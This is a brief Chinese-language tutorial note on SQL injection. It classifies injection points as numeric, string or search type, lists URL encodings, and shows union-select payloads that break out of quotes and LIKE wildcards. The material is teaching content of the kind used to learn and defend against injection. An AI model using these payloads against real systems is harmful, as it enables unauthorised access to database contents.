一、分类

1.数字型、字符型、搜索型
2.url编码后的几个字符
空格 %20
井号 %23
单引号 %27

二、分析

1.数字型
数字型参数执行后的sql语句：
select * from admin where id =$id;
添加注入代码：
select * from admin where id =1 union select 1,2,3;

2.字符型(注入代码容易受到单引号干扰)
字符型参数执行后的sql语句：
select * from admin where name ='$name';
添加注入代码：
select * from admin where name ='root union select 1,2,3';
发现注入代码被包在单引号内，代码功能失效！
修改注入代码为：
root‘ union select 1,2,3 #
注入语句：
select * from admin where name ='root' union select 1,2,3 #';

3.搜索型(注入代码容易受到单引号和百分号的干扰)
搜索型参数执行后的sql语句
select * from admin where name like '%$admin%';
添加注入代码：
select * from admin where name like '%jack union select 1,2,3%';
发现注入代码被单引号和%干扰
修改注入代码：
%jack%' union select 1,2,3 '%
执行：
select * from admin where name like '%jack%' union select 1,2,3 '%';
或者：
select * from admin where name like '%jack%' union select 1,2,3 '% %';